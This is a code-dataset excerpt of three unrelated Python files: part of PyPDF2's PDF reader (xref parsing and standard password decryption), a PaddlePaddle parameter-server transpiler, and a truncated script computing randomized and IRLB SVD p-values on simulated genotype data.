self.trailer[TK.ROOT][\"/PageMode\"]\n except KeyError:\n return None\n\n @property\n def pageMode(self):\n \"\"\"Read-only property accessing the\n :meth:`getPageMode()` method.\"\"\"\n return self.getPageMode()\n\n def _flatten(self, pages=None, inherit=None, indirectRef=None):\n inheritablePageAttributes = (\n NameObject(PG.RESOURCES),\n NameObject(PG.MEDIABOX),\n NameObject(PG.CROPBOX),\n NameObject(PG.ROTATE),\n )\n if inherit is None:\n inherit = {}\n if pages is None:\n # Fix issue 327: set flattenedPages attribute only for\n # decrypted file\n catalog = self.trailer[TK.ROOT].getObject()\n pages = catalog[\"/Pages\"].getObject()\n self.flattenedPages = []\n\n t = \"/Pages\"\n if PA.TYPE in pages:\n t = pages[PA.TYPE]\n\n if t == \"/Pages\":\n for attr in inheritablePageAttributes:\n if attr in pages:\n inherit[attr] = pages[attr]\n for page in pages[PA.KIDS]:\n addt = {}\n if isinstance(page, IndirectObject):\n addt[\"indirectRef\"] = page\n self._flatten(page.getObject(), inherit, **addt)\n elif t == \"/Page\":\n for attr, value in list(inherit.items()):\n # if the page has it's own value, it does not inherit the\n # parent's value:\n if attr not in pages:\n pages[attr] = value\n page_obj = PageObject(self, indirectRef)\n page_obj.update(pages)\n self.flattenedPages.append(page_obj)\n\n def _getObjectFromStream(self, indirectReference):\n # indirect reference to object in object stream\n # read the entire object stream into memory\n stmnum, idx = self.xref_objStm[indirectReference.idnum]\n obj_stm = IndirectObject(stmnum, 0, self).getObject()\n # This is an xref to a stream, so its type better be a stream\n assert obj_stm[\"/Type\"] == \"/ObjStm\"\n # /N is the number of indirect objects in the stream\n assert idx < obj_stm[\"/N\"]\n stream_data = BytesIO(b_(obj_stm.getData()))\n for i in range(obj_stm[\"/N\"]):\n readNonWhitespace(stream_data)\n stream_data.seek(-1, 1)\n objnum = NumberObject.readFromStream(stream_data)\n readNonWhitespace(stream_data)\n stream_data.seek(-1, 1)\n offset = NumberObject.readFromStream(stream_data)\n readNonWhitespace(stream_data)\n stream_data.seek(-1, 1)\n if objnum != indirectReference.idnum:\n # We're only interested in one object\n continue\n if self.strict and idx != i:\n raise PdfReadError(\"Object is in wrong index.\")\n stream_data.seek(obj_stm[\"/First\"] + offset, 0)\n try:\n obj = readObject(stream_data, self)\n except PdfStreamError as e:\n # Stream object cannot be read. Normally, a critical error, but\n # Adobe Reader doesn't complain, so continue (in strict mode?)\n e = sys.exc_info()[1]\n warnings.warn(\n \"Invalid stream (index %d) within object %d %d: %s\"\n % (i, indirectReference.idnum, indirectReference.generation, e),\n PdfReadWarning,\n )\n\n if self.strict:\n raise PdfReadError(\"Can't read object stream: %s\" % e)\n # Replace with null. Hopefully it's nothing important.\n obj = NullObject()\n return obj\n\n if self.strict:\n raise PdfReadError(\"This is a fatal error in strict mode.\")\n return NullObject()\n\n def getObject(self, indirectReference):\n retval = self.cacheGetIndirectObject(\n indirectReference.generation, indirectReference.idnum\n )\n if retval is not None:\n return retval\n if (\n indirectReference.generation == 0\n and indirectReference.idnum in self.xref_objStm\n ):\n retval = self._getObjectFromStream(indirectReference)\n elif (\n indirectReference.generation in self.xref\n and indirectReference.idnum in self.xref[indirectReference.generation]\n ):\n start = self.xref[indirectReference.generation][indirectReference.idnum]\n self.stream.seek(start, 0)\n idnum, generation = self.readObjectHeader(self.stream)\n if idnum != indirectReference.idnum and self.xrefIndex:\n # Xref table probably had bad indexes due to not being zero-indexed\n if self.strict:\n raise PdfReadError(\n \"Expected object ID (%d %d) does not match actual (%d %d); xref table not zero-indexed.\"\n % (\n indirectReference.idnum,\n indirectReference.generation,\n idnum,\n generation,\n )\n )\n else:\n pass # xref table is corrected in non-strict mode\n elif idnum != indirectReference.idnum and self.strict:\n # some other problem\n raise PdfReadError(\n \"Expected object ID (%d %d) does not match actual (%d %d).\"\n % (\n indirectReference.idnum,\n indirectReference.generation,\n idnum,\n generation,\n )\n )\n if self.strict:\n assert generation == indirectReference.generation\n retval = readObject(self.stream, self)\n\n # override encryption is used for the /Encrypt dictionary\n if not self._override_encryption and self.isEncrypted:\n # if we don't have the encryption key:\n if not hasattr(self, \"_decryption_key\"):\n raise PdfReadError(\"file has not been decrypted\")\n # otherwise, decrypt here...\n pack1 = struct.pack(\" size1M else absoluteEndFilePos\n stream.seek(-datablock, 2)\n tmp = stream.read(datablock)\n xref_loc = tmp.find(b_(\"xref\"))\n if xref_loc != -1:\n startxref = absoluteEndFilePos - datablock + xref_loc\n\n # check and eventually correct the startxref only in not strict\n xref_issue_nr = self._get_xref_issues(stream, startxref)\n if self.strict and xref_issue_nr:\n raise PdfReadError(\"Broken xref table\")\n elif xref_issue_nr != 0:\n warnings.warn(\n \"incorrect startxref pointer({})\".format(xref_issue_nr), PdfReadWarning\n )\n\n # read all cross reference tables and their trailers\n self.xref = {}\n self.xref_objStm = {}\n self.trailer = DictionaryObject()\n while True:\n # load the xref table\n stream.seek(startxref, 0)\n x = stream.read(1)\n if x == b_(\"x\"):\n self._read_standard_xref_table(stream)\n readNonWhitespace(stream)\n stream.seek(-1, 1)\n new_trailer = readObject(stream, self)\n for key, value in list(new_trailer.items()):\n if key not in self.trailer:\n self.trailer[key] = value\n if \"/Prev\" in new_trailer:\n startxref = new_trailer[\"/Prev\"]\n else:\n break\n elif xref_issue_nr:\n try:\n self._rebuild_xref_table(stream)\n break\n except Exception:\n xref_issue_nr = 0\n elif x.isdigit():\n xrefstream = self._read_pdf15_xref_stream(stream)\n\n trailer_keys = TK.ROOT, TK.ENCRYPT, TK.INFO, TK.ID\n for key in trailer_keys:\n if key in xrefstream and key not in self.trailer:\n self.trailer[NameObject(key)] = xrefstream.raw_get(key)\n if \"/Prev\" in xrefstream:\n startxref = xrefstream[\"/Prev\"]\n else:\n break\n else:\n # some PDFs have /Prev=0 in the trailer, instead of no /Prev\n if startxref == 0:\n if self.strict:\n raise PdfReadError(\n \"/Prev=0 in the trailer (try opening with strict=False)\"\n )\n else:\n warnings.warn(\n \"/Prev=0 in the trailer - assuming there\"\n \" is no previous xref table\"\n )\n break\n # bad xref character at startxref. Let's see if we can find\n # the xref table nearby, as we've observed this error with an\n # off-by-one before.\n stream.seek(-11, 1)\n tmp = stream.read(20)\n xref_loc = tmp.find(b_(\"xref\"))\n if xref_loc != -1:\n startxref -= 10 - xref_loc\n continue\n # No explicit xref table, try finding a cross-reference stream.\n stream.seek(startxref, 0)\n found = False\n for look in range(5):\n if stream.read(1).isdigit():\n # This is not a standard PDF, consider adding a warning\n startxref += look\n found = True\n break\n if found:\n continue\n # no xref table found at specified location\n raise PdfReadError(\"Could not find xref table at specified location\")\n\n if not self.xref:\n raise PdfReadError(\"Could not find xref table - broken file\")\n # if not zero-indexed, verify that the table is correct; change it if necessary\n if self.xrefIndex and not self.strict:\n loc = stream.tell()\n for gen in self.xref:\n if gen == 65535:\n continue\n for id in self.xref[gen]:\n stream.seek(self.xref[gen][id], 0)\n try:\n pid, pgen = self.readObjectHeader(stream)\n except ValueError:\n break\n if pid == id - self.xrefIndex:\n self._zeroXref(gen)\n break\n # if not, then either it's just plain wrong, or the\n # non-zero-index is actually correct\n stream.seek(loc, 0) # return to where it was\n\n def _find_startxref_pos(self, stream):\n \"\"\"Find startxref entry - the location of the xref table\"\"\"\n line = self.readNextEndLine(stream)\n try:\n startxref = int(line)\n except ValueError:\n # 'startxref' may be on the same line as the location\n if not line.startswith(b_(\"startxref\")):\n raise PdfReadError(\"startxref not found\")\n startxref = int(line[9:].strip())\n warnings.warn(\"startxref on same line as offset\")\n else:\n line = self.readNextEndLine(stream)\n if line[:9] != b_(\"startxref\"):\n raise PdfReadError(\"startxref not found\")\n return startxref\n\n def _read_standard_xref_table(self, stream):\n # standard cross-reference table\n ref = stream.read(4)\n if ref[:3] != b_(\"ref\"):\n raise PdfReadError(\"xref table read error\")\n readNonWhitespace(stream)\n stream.seek(-1, 1)\n firsttime = True # check if the first time looking at the xref table\n while True:\n num = readObject(stream, self)\n if firsttime and num != 0:\n self.xrefIndex = num\n if self.strict:\n warnings.warn(\n \"Xref table not zero-indexed. ID numbers for objects will be corrected.\",\n PdfReadWarning,\n )\n # if table not zero indexed, could be due to error from when PDF was created\n # which will lead to mismatched indices later on, only warned and corrected if self.strict=True\n firsttime = False\n readNonWhitespace(stream)\n stream.seek(-1, 1)\n size = readObject(stream, self)\n readNonWhitespace(stream)\n stream.seek(-1, 1)\n cnt = 0\n while cnt < size:\n line = stream.read(20)\n\n # It's very clear in section 3.4.3 of the PDF spec\n # that all cross-reference table lines are a fixed\n # 20 bytes (as of PDF 1.7). However, some files have\n # 21-byte entries (or more) due to the use of \\r\\n\n # (CRLF) EOL's. Detect that case, and adjust the line\n # until it does not begin with a \\r (CR) or \\n (LF).\n while line[0] in b_(\"\\x0D\\x0A\"):\n stream.seek(-20 + 1, 1)\n line = stream.read(20)\n\n # On the other hand, some malformed PDF files\n # use a single character EOL without a preceeding\n # space. Detect that case, and seek the stream\n # back one character. (0-9 means we've bled into\n # the next xref entry, t means we've bled into the\n # text \"trailer\"):\n if line[-1] in b_(\"0123456789t\"):\n stream.seek(-1, 1)\n\n offset, generation = line[:16].split(b_(\" \"))\n offset, generation = int(offset), int(generation)\n if generation not in self.xref:\n self.xref[generation] = {}\n if num in self.xref[generation]:\n # It really seems like we should allow the last\n # xref table in the file to override previous\n # ones. Since we read the file backwards, assume\n # any existing key is already set correctly.\n pass\n else:\n self.xref[generation][num] = offset\n cnt += 1\n num += 1\n readNonWhitespace(stream)\n stream.seek(-1, 1)\n trailertag = stream.read(7)\n if trailertag != b_(\"trailer\"):\n # more xrefs!\n stream.seek(-7, 1)\n else:\n break\n\n def _read_pdf15_xref_stream(self, stream):\n # PDF 1.5+ Cross-Reference Stream\n stream.seek(-1, 1)\n idnum, generation = self.readObjectHeader(stream)\n xrefstream = readObject(stream, self)\n assert xrefstream[\"/Type\"] == \"/XRef\"\n self.cacheIndirectObject(generation, idnum, xrefstream)\n stream_data = BytesIO(b_(xrefstream.getData()))\n # Index pairs specify the subsections in the dictionary. If\n # none create one subsection that spans everything.\n idx_pairs = xrefstream.get(\"/Index\", [0, xrefstream.get(\"/Size\")])\n entry_sizes = xrefstream.get(\"/W\")\n assert len(entry_sizes) >= 3\n if self.strict and len(entry_sizes) > 3:\n raise PdfReadError(\"Too many entry sizes: %s\" % entry_sizes)\n\n def get_entry(i):\n # Reads the correct number of bytes for each entry. See the\n # discussion of the W parameter in PDF spec table 17.\n if entry_sizes[i] > 0:\n d = stream_data.read(entry_sizes[i])\n return convertToInt(d, entry_sizes[i])\n\n # PDF Spec Table 17: A value of zero for an element in the\n # W array indicates...the default value shall be used\n if i == 0:\n return 1 # First value defaults to 1\n else:\n return 0\n\n def used_before(num, generation):\n # We move backwards through the xrefs, don't replace any.\n return num in self.xref.get(generation, []) or num in self.xref_objStm\n\n # Iterate through each subsection\n self._read_xref_subsections(idx_pairs, get_entry, used_before)\n return xrefstream\n\n @staticmethod\n def _size_to_search_xref():\n # 1MB\n return 1024 * 1024\n\n @staticmethod\n def _get_xref_issues(stream, startxref):\n \"\"\"Return an int which indicates an issue. 0 means there is no issue.\"\"\"\n if startxref == 0:\n return 0\n stream.seek(startxref - 1, 0) # -1 to check character before\n line = stream.read(1)\n if line not in b_(\"\\r\\n \\t\"):\n return 1\n line = stream.read(4)\n if line != b_(\"xref\"):\n # not an xref so check if it is an XREF object\n line = b_(\"\")\n while line in b_(\"0123456789 \\t\"):\n line = stream.read(1)\n if line == b_(\"\"):\n return 2\n line += stream.read(2) # 1 char already read, +2 to check \"obj\"\n if line.lower() != b_(\"obj\"):\n return 3\n # while stream.read(1) in b_(\" \\t\\r\\n\"):\n # pass\n # line = stream.read(256) # check that it is xref obj\n # if b_(\"/xref\") not in line.lower():\n # return 4\n return 0\n\n def _rebuild_xref_table(self, stream):\n self.xref = {}\n stream.seek(0, 0)\n f_ = stream.read(-1)\n import re\n\n for m in re.finditer(b_(r\"[\\r\\n \\t][ \\t]*(\\d+)[ \\t]+(\\d+)[ \\t]+obj\"), f_):\n idnum = int(m.group(1))\n generation = int(m.group(2))\n if generation not in self.xref:\n self.xref[generation] = {}\n self.xref[generation][idnum] = m.start(1)\n trailer_pos = f_.rfind(b\"trailer\") - len(f_) + 7\n stream.seek(trailer_pos, 2)\n # code below duplicated\n readNonWhitespace(stream)\n stream.seek(-1, 1)\n\n # there might be something that is not a dict (see #856)\n new_trailer = readObject(stream, self)\n\n for key, value in list(new_trailer.items()):\n if key not in self.trailer:\n self.trailer[key] = value\n\n def _read_xref_subsections(self, idx_pairs, getEntry, used_before):\n last_end = 0\n for start, size in self._pairs(idx_pairs):\n # The subsections must increase\n assert start >= last_end\n last_end = start + size\n for num in range(start, start + size):\n # The first entry is the type\n xref_type = getEntry(0)\n # The rest of the elements depend on the xref_type\n if xref_type == 0:\n # linked list of free objects\n next_free_object = getEntry(1) # noqa: F841\n next_generation = getEntry(2) # noqa: F841\n elif xref_type == 1:\n # objects that are in use but are not compressed\n byte_offset = getEntry(1)\n generation = getEntry(2)\n if generation not in self.xref:\n self.xref[generation] = {}\n if not used_before(num, generation):\n self.xref[generation][num] = byte_offset\n elif xref_type == 2:\n # compressed objects\n objstr_num = getEntry(1)\n obstr_idx = getEntry(2)\n generation = 0 # PDF spec table 18, generation is 0\n if not used_before(num, generation):\n self.xref_objStm[num] = (objstr_num, obstr_idx)\n elif self.strict:\n raise PdfReadError(\"Unknown xref type: %s\" % xref_type)\n\n def _zeroXref(self, generation):\n self.xref[generation] = {\n k - self.xrefIndex: v for (k, v) in list(self.xref[generation].items())\n }\n\n def _pairs(self, array):\n i = 0\n while True:\n yield array[i], array[i + 1]\n i += 2\n if (i + 1) >= len(array):\n break\n\n def readNextEndLine(self, stream, limit_offset=0):\n line_parts = []\n while True:\n # Prevent infinite loops in malformed PDFs\n if stream.tell() == 0 or stream.tell() == limit_offset:\n raise PdfReadError(\"Could not read malformed PDF file\")\n x = stream.read(1)\n if stream.tell() < 2:\n raise PdfReadError(\"EOL marker not found\")\n stream.seek(-2, 1)\n if x == b_(\"\\n\") or x == b_(\"\\r\"): ## \\n = LF; \\r = CR\n crlf = False\n while x == b_(\"\\n\") or x == b_(\"\\r\"):\n x = stream.read(1)\n if x == b_(\"\\n\") or x == b_(\"\\r\"): # account for CR+LF\n stream.seek(-1, 1)\n crlf = True\n if stream.tell() < 2:\n raise PdfReadError(\"EOL marker not found\")\n stream.seek(-2, 1)\n stream.seek(\n 2 if crlf else 1, 1\n ) # if using CR+LF, go back 2 bytes, else 1\n break\n else:\n line_parts.append(x)\n line_parts.reverse()\n return b\"\".join(line_parts)\n\n def decrypt(self, password):\n \"\"\"\n When using an encrypted / secured PDF file with the PDF Standard\n encryption handler, this function will allow the file to be decrypted.\n It checks the given password against the document's user password and\n owner password, and then stores the resulting decryption key if either\n password is correct.\n\n It does not matter which password was matched. Both passwords provide\n the correct decryption key that will allow the document to be used with\n this library.\n\n :param str password: The password to match.\n :return: ``0`` if the password failed, ``1`` if the password matched the user\n password, and ``2`` if the password matched the owner password.\n :rtype: int\n :raises NotImplementedError: if document uses an unsupported encryption\n method.\n \"\"\"\n\n self._override_encryption = True\n try:\n return self._decrypt(password)\n finally:\n self._override_encryption = False\n\n def decode_permissions(self, permissions_code):\n # Takes the permissions as an integer, returns the allowed access\n permissions = {}\n permissions[\"print\"] = permissions_code & (1 << 3 - 1) != 0 # bit 3\n permissions[\"modify\"] = permissions_code & (1 << 4 - 1) != 0 # bit 4\n permissions[\"copy\"] = permissions_code & (1 << 5 - 1) != 0 # bit 5\n permissions[\"annotations\"] = permissions_code & (1 << 6 - 1) != 0 # bit 6\n permissions[\"forms\"] = permissions_code & (1 << 9 - 1) != 0 # bit 9\n permissions[\"accessability\"] = permissions_code & (1 << 10 - 1) != 0 # bit 10\n permissions[\"assemble\"] = permissions_code & (1 << 11 - 1) != 0 # bit 11\n permissions[\"print_high_quality\"] = (\n permissions_code & (1 << 12 - 1) != 0\n ) # bit 12\n return permissions\n\n def _decrypt(self, password):\n # Decrypts data as per Section 3.5 (page 117) of PDF spec v1.7\n # \"The security handler defines the use of encryption and decryption in\n # the document, using the rules specified by the CF, StmF, and StrF entries\"\n encrypt = self.trailer[TK.ENCRYPT].getObject()\n # /Encrypt Keys:\n # Filter (name) : \"name of the preferred security handler \"\n # V (number) : Algorithm Code\n # Length (integer): Length of encryption key, in bits\n # CF (dictionary) : Crypt filter\n # StmF (name) : Name of the crypt filter that is used by default when decrypting streams\n # StrF (name) : The name of the crypt filter that is used when decrypting all strings in the document\n # R (number) : Standard security handler revision number\n # U (string) : A 32-byte string, based on the user password\n # P (integer) : Permissions allowed with user access\n if encrypt[\"/Filter\"] != \"/Standard\":\n raise NotImplementedError(\n \"only Standard PDF encryption handler is available\"\n )\n if not (encrypt[\"/V\"] in (1, 2)):\n raise NotImplementedError(\n \"only algorithm code 1 and 2 are supported. This PDF uses code %s\"\n % encrypt[\"/V\"]\n )\n user_password, key = self._authenticateUserPassword(password)\n if user_password:\n self._decryption_key = key\n return 1\n else:\n rev = encrypt[\"/R\"].getObject()\n if rev == 2:\n keylen = 5\n else:\n keylen = encrypt[SA.LENGTH].getObject() // 8\n key = _alg33_1(password, rev, keylen)\n real_O = encrypt[\"/O\"].getObject()\n if rev == 2:\n userpass = utils.RC4_encrypt(key, real_O)\n else:\n val = real_O\n for i in range(19, -1, -1):\n new_key = b_(\"\")\n for l in range(len(key)):\n new_key += b_(chr(utils.ord_(key[l]) ^ i))\n val = utils.RC4_encrypt(new_key, val)\n userpass = val\n owner_password, key = self._authenticateUserPassword(userpass)\n if owner_password:\n self._decryption_key = key\n return 2\n return 0\n\n def _authenticateUserPassword(self, password):\n encrypt = self.trailer[TK.ENCRYPT].getObject()\n rev = encrypt[ED.R].getObject()\n owner_entry = encrypt[ED.O].getObject()\n p_entry = encrypt[ED.P].getObject()\n if TK.ID in self.trailer:\n id_entry = self.trailer[TK.ID].getObject()\n else:\n # Some documents may not have a /ID, use two empty\n # byte strings instead. Solves\n # https://github.com/mstamy2/PyPDF2/issues/608\n id_entry = ArrayObject([ByteStringObject(b\"\"), ByteStringObject(b\"\")])\n id1_entry = id_entry[0].getObject()\n real_U = encrypt[ED.U].getObject().original_bytes\n if rev == 2:\n U, key = _alg34(password, owner_entry, p_entry, id1_entry)\n elif rev >= 3:\n U, key = _alg35(\n password,\n rev,\n encrypt[SA.LENGTH].getObject() // 8,\n owner_entry,\n p_entry,\n id1_entry,\n encrypt.get(ED.ENCRYPT_METADATA, BooleanObject(False)).getObject(),\n )\n U, real_U = U[:16], real_U[:16]\n return U == real_U, key\n\n def getIsEncrypted(self):\n return TK.ENCRYPT in self.trailer\n\n @property\n def isEncrypted(self):\n \"\"\"\n Read-only boolean property showing whether this PDF file is encrypted.\n Note that this property, if true, will remain true even after the\n :meth:`decrypt()` method is called.\n \"\"\"\n return self.getIsEncrypted()\n","sub_path":"PyPDF2/_reader.py","file_name":"_reader.py","file_ext":"py","file_size_in_byte":56350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"79379892","text":"# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserve.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport framework\nfrom framework import Program, default_main_program, Parameter, Variable\nimport optimizer\nfrom layer_helper import LayerHelper\n\n\ndef hash_name_to_server(params_grads, pserver_endpoints):\n \"\"\"\n :param param_grads:\n :return: a map of pserver endpoint -> \n params -> [param list]\n grads -> [grad list]\n \"\"\"\n\n def _hash_param(param_name, total):\n return hash(param_name) % total\n\n param_grad_map = dict()\n for param, grad in params_grads:\n if param.trainable is True and grad is not None:\n server_id = _hash_param(param.name, len(pserver_endpoints))\n server_for_param = pserver_endpoints[server_id]\n if not param_grad_map.has_key(server_for_param):\n param_grad_map[server_for_param] = {\"params\": [], \"grads\": []}\n param_grad_map[server_for_param][\"params\"].append(param)\n param_grad_map[server_for_param][\"grads\"].append(grad)\n\n return param_grad_map\n\n\ndef round_robin(params_grads, pserver_endpoints):\n assert (len(params_grads) > len(pserver_endpoints))\n\n param_grad_map = dict()\n pserver_idx = 0\n for param, grad in params_grads:\n if param.trainable is True:\n server_for_param = pserver_endpoints[pserver_idx]\n if not param_grad_map.has_key(server_for_param):\n param_grad_map[server_for_param] = {\"params\": [], \"grads\": []}\n\n param_grad_map[server_for_param][\"params\"].append(param)\n param_grad_map[server_for_param][\"grads\"].append(grad)\n\n pserver_idx += 1\n if pserver_idx >= len(pserver_endpoints):\n pserver_idx = 0\n return param_grad_map\n\n\nclass SimpleDistributeTranspiler:\n def transpile(self,\n optimize_ops,\n params_grads,\n program=None,\n pservers=\"127.0.0.1:6174\",\n trainers=1,\n split_method=round_robin):\n \"\"\"\n Transpile the program to a distributed data-parallelism programs.\n\n The main_program will be transform to use a remote parameter server\n to do parameter optimization. And the optimization graph will be put\n in to a parameter server program.\n\n Use different methods to split trainable varialbles to different\n parameter servers.\n\n Example to run:\n\n exe = fluid.Executor(place)\n t = fluid.DistributeTranspiler()\n t.transpile(optimize_ops, params_grads, pservers=\"127.0.0.1:6174\", trainers=1)\n\n pserver_endpoint = os.getenv(\"PSERVER\")\n if pserver_endpoint:\n pserver_prog = t.get_pserver_program(pserver_endpoint, optimize_ops)\n exe.run(fluid.default_startup_program())\n exe.run(pserver_prog)\n else:\n feeder = fluid.DataFeeder(feed_list=[images, label], place=place)\n exe.run(fluid.default_startup_program())\n\n for pass_id in range(PASS_NUM):\n ...\n\n :param optimize_ops: op list of optimization, should be the\n return value of Optimizer.minimize\n :type optimize_ops: list\n :param program: program to optimize, default default_main_program\n :param pservers: parameter server endpoints like \"m1:6174,m2:6174\"\n :type pservers: string\n\n :return: return a list of programs\n \"\"\"\n if program is None:\n program = default_main_program()\n self.program = program\n self.trainers = trainers\n self.optimize_ops = optimize_ops\n self._optimize_distributed(\n optimize_ops,\n program,\n params_grads,\n pservers=pservers,\n trainers=trainers,\n split_method=split_method)\n\n def _clone_param(self, block, v):\n assert isinstance(v, Parameter)\n new_p = Parameter(\n block=block,\n shape=v.shape,\n dtype=v.dtype,\n type=v.type,\n lod_level=v.lod_level,\n stop_gradient=v.stop_gradient,\n trainable=v.trainable,\n optimize_attr=v.optimize_attr,\n regularizer=v.regularizer,\n name=v.name)\n block.vars[new_p.name] = new_p\n\n def _clone_var(self, block, var):\n assert isinstance(var, Variable)\n return block.create_var(\n name=var.name,\n shape=var.shape,\n dtype=var.dtype,\n type=var.type,\n lod_level=var.lod_level,\n persistable=var.persistable)\n\n def _optimize_distributed(self, optimize_ops, program, params_and_grads,\n **kwargs):\n if kwargs.has_key(\"split_method\"):\n split_method = kwargs[\"split_method\"]\n else:\n split_method = round_robin\n\n assert (callable(split_method))\n pserver_endpoints = kwargs[\"pservers\"].split(\",\")\n self.param_grad_map = split_method(params_and_grads, pserver_endpoints)\n\n send_op_ordered_inputs = []\n send_op_ordered_outputs = []\n epmap = []\n for ep, v in self.param_grad_map.iteritems():\n send_op_ordered_inputs.extend(v[\"grads\"])\n send_op_ordered_outputs.extend(v[\"params\"])\n for i in v[\"grads\"]:\n epmap.append(ep)\n send_op = program.global_block().append_op(\n type=\"send\",\n inputs={\"X\": send_op_ordered_inputs\n }, # inputs is a list of tensors to be send\n outputs={\"Out\": send_op_ordered_outputs},\n attrs={\"endpoints\": pserver_endpoints,\n \"epmap\": epmap})\n\n def get_trainer_program(self):\n # remove optimize ops and add a send op to main_program\n self.program.global_block().delete_ops(self.optimize_ops)\n return self.program\n\n def _create_var_for_trainers(self, block, var, trainers):\n var_list = []\n for i in xrange(trainers):\n var_each = block.create_var(\n name=\"%s.trainer_%d\" % (var.name, i),\n psersistable=var.persistable,\n dtype=var.dtype,\n shape=var.shape)\n var_list.append(var_each)\n return var_list\n\n def get_pserver_program(self, endpoint, optimize_ops):\n pserver_program = Program()\n for v in self.param_grad_map[endpoint][\"params\"]:\n self._clone_param(pserver_program.global_block(), v)\n\n optimize_sub_program = Program()\n grad_var_names = [\n var.name for var in self.param_grad_map[endpoint][\"grads\"]\n ]\n for opt_op in optimize_ops:\n for _, var in opt_op.inputs.iteritems():\n # NOTE: append operators to merge gradients from multiple\n # trainers. If trainers == 1, this is not needed.\n if self.trainers > 1 and var.name in grad_var_names:\n vars2merge = self._create_var_for_trainers(\n optimize_sub_program.global_block(), var, self.trainers)\n merged_var = optimize_sub_program.global_block().create_var(\n name=var.name,\n persistable=var.persistable,\n dtype=var.dtype,\n shape=var.shape)\n optimize_sub_program.global_block().append_op(\n type=\"sum\",\n inputs={\"X\": vars2merge},\n outputs={\"Out\": merged_var})\n optimize_sub_program.global_block().append_op(\n type=\"scale\",\n inputs={\"X\": merged_var},\n outputs={\"Out\": merged_var},\n attrs={\"scale\": 1.0 / float(self.trainers)})\n else:\n optimize_sub_program.global_block().create_var(\n name=var.name,\n persistable=var.persistable,\n dtype=var.dtype,\n shape=var.shape)\n\n if opt_op.inputs.has_key(\"Grad\"):\n if opt_op.inputs[\"Grad\"].name in grad_var_names:\n optimize_sub_program.global_block().append_op(\n type=opt_op.type,\n inputs=opt_op.inputs,\n outputs=opt_op.outputs,\n attrs=opt_op.attrs)\n else:\n optimize_sub_program.global_block().append_op(\n type=opt_op.type,\n inputs=opt_op.inputs,\n outputs=opt_op.outputs,\n attrs=opt_op.attrs)\n pserver_program.global_block().append_op(\n type=\"recv\",\n inputs={\"RX\":\n self.param_grad_map[endpoint][\"grads\"]}, # grads to recv\n outputs={},\n attrs={\n \"OptimizeBlock\": optimize_sub_program.global_block(),\n \"endpoint\": endpoint,\n \"ParamList\":\n [p.name for p in self.param_grad_map[endpoint][\"params\"]],\n \"GradList\":\n [p.name for p in self.param_grad_map[endpoint][\"grads\"]],\n \"Trainers\": self.trainers\n })\n pserver_program.sync_with_cpp()\n return pserver_program\n","sub_path":"python/paddle/v2/fluid/distribute_transpiler_simple.py","file_name":"distribute_transpiler_simple.py","file_ext":"py","file_size_in_byte":10073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"517325988","text":"import numpy as np\r\nimport time\r\nimport scipy as sp\r\nimport scipy.linalg\r\nfrom scipy import sparse\r\nimport scipy.sparse.linalg\r\nimport random\r\nimport matplotlib.pyplot as plt\r\nimport warnings\r\n\r\n\r\ndef prep_data():\r\n x = np.loadtxt(\"simulated_genos\", delimiter=\" \", dtype=\"float32\")\r\n y = np.array([[1] * 10000 + [0] * 10000], dtype=\"float32\")\r\n y_c = y - 0.5\r\n return x, y, y_c\r\n\r\n#############################################\r\n#IRLB\r\n\r\n\r\ndef mult(A,x,t=False):\r\n if(sparse.issparse(A)):\r\n m = A.shape[0]\r\n n = A.shape[1]\r\n if(t):\r\n return(sparse.csr_matrix(x).dot(A).transpose().todense().A[:,0])\r\n return(A.dot(sparse.csr_matrix(x).transpose()).todense().A[:,0])\r\n if(t):\r\n return(x.dot(A))\r\n return(A.dot(x))\r\n\r\ndef orthog(Y,X):\r\n dotY = mult(X,Y,t=True)\r\n return (Y - mult(X,dotY))\r\n\r\n\r\ndef invcheck(x):\r\n eps2 = 2*np.finfo(np.float).eps\r\n if(x>eps2):\r\n x = 1/x\r\n else:\r\n x = 0\r\n return(x)\r\n\r\ndef irlb(A,n,tol=0.0001,maxit=50):\r\n nu = n\r\n m = A.shape[0]\r\n n = A.shape[1]\r\n m_b = min((nu+20, 3*nu, n))\r\n mprod = 0\r\n it = 0\r\n j = 0\r\n k = nu\r\n smax = 1\r\n ifsparse = sparse.issparse(A)\r\n\r\n V = np.zeros((n,m_b))\r\n W = np.zeros((m,m_b))\r\n F = np.zeros((n,1))\r\n B = np.zeros((m_b,m_b))\r\n\r\n V[:,0] = np.random.randn(n)\r\n V[:,0] = V[:,0]/np.linalg.norm(V)\r\n\r\n while(it < maxit):\r\n if(it>0): j=k\r\n W[:,j] = mult(A,V[:,j])\r\n mprod+=1\r\n if(it>0):\r\n W[:,j] = orthog(W[:,j],W[:,0:j]) # NB W[:,0:j] selects columns 0,1,...,j-1\r\n s = np.linalg.norm(W[:,j])\r\n sinv = invcheck(s)\r\n W[:,j] = sinv*W[:,j]\r\n while(j num]\r\n return i_arr[0] / len(arr) if len(i_arr) > 0 else 1\r\n\r\n\r\ndef p_cal(Q_distribution, q=223.25):\r\n abs_Q_distribution = abs(Q_distribution - np.average(Q_distribution))\r\n q_abs = abs(q - np.average(Q_distribution))\r\n p = 1 - inverse_percentile(abs_Q_distribution, q_abs)\r\n return p\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # Specify file path here. Default is current working directory.\r\n x, y, y_c = prep_data()\r\n q = 223.25\r\n n = 20000\r\n X = x[:, :]\r\n n = X.shape[0]\r\n p = X.shape[1]\r\n X_sparse = sp.sparse.csr_matrix(X)\r\n\r\n # IRLB: This is the first implementation. Slow.\r\n eig_irlb = irlb(X, 50)[1] ** 2\r\n\r\n # RSVD: This is the second implementation. Fast.\r\n # If need to test speed, use this one.\r\n start_time = time.clock()\r\n eig_rsvd = randomized_svd(x, 50)[1] ** 2\r\n end_time = time.clock()\r\n print(\"The time of RSVD is: \", end_time - start_time)\r\n\r\n # Calculate p-value\r\n Q_distribution_1 = generate_Q(eig=eig_irlb)\r\n print(\"The p-value of IRLB is:\", 